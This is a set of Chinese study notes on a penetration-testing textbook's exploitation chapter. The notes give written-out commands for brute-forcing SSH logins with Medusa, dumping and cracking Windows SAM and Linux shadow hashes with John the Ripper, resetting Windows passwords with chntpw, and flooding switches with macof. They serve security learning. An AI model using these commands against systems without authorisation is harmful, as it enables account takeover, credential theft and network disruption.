《渗透测试实践指南》读书笔记之漏洞利用

远程密码破解：Medusa，Hydra

medusa -h target_ip -U user_list -P pass_dict -M service_to_attack
如：medusa -h 192.168.1.10 -u ownedb -P /pentest/passwords/wordlists/darkc0de.lst -M ssh

Meterpreter shell

migrate：迁移进程
download：从目标下载文件或文件夹
upload：上传文件到目标系统

密码破解：John the Ripper

破解SAM（需要system和SAM文件）
光盘启动bt，挂在windows系统盘，进入windows/system32/config目录
获取密码的hash：samdump2 system SAM > /tmp/hashes.txt
cd /pentest/passwords/jtr
./john /tmp/hashes.txt -f:NT

破解Linux shadow
cd /pentest/passwords/jtr
./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt
./john /tmp/linux_hashes.txt

密码重置：chntpw

光盘启动bt，挂在windows系统盘
cd /pentest/passwords/jtr
交互式重置：./chntpw -i /mnt/sda1/windows/system32/config/SAM
根据提示一步步走就行了

网络嗅探

集线器（hub），将网络数据包发送给连接到该hub的所有计算机，各计算机的网卡来判断接收还是丢弃；
交换机（switch）：维持着MAC地址和交换机端口的匹配表，分别将包含不同目的地址的网络包发往不同的端口；
泛洪攻击交换机：大多数交换机存储匹配表的容量是非常有限的，通过耗尽内存，并用大量伪造的MAC地址泛洪该匹配表，就可以使交换机无法访问这个匹配表。由于此时交换机无法根据MAC地址匹配出正确的端口，因此就会简单地把流量广播到所有端口，这种模式成为失效开放（fail open）。一些交换机被设置为失效关闭（fail close），在失效时会停止数据包的传送，这样就等同于DOS攻击。
嗅探网络流量的工具集：Dsniff，其中有个工具macof，可以对交换机进行泛洪攻击；
macof -i eth0 -s source_ip -d target_ip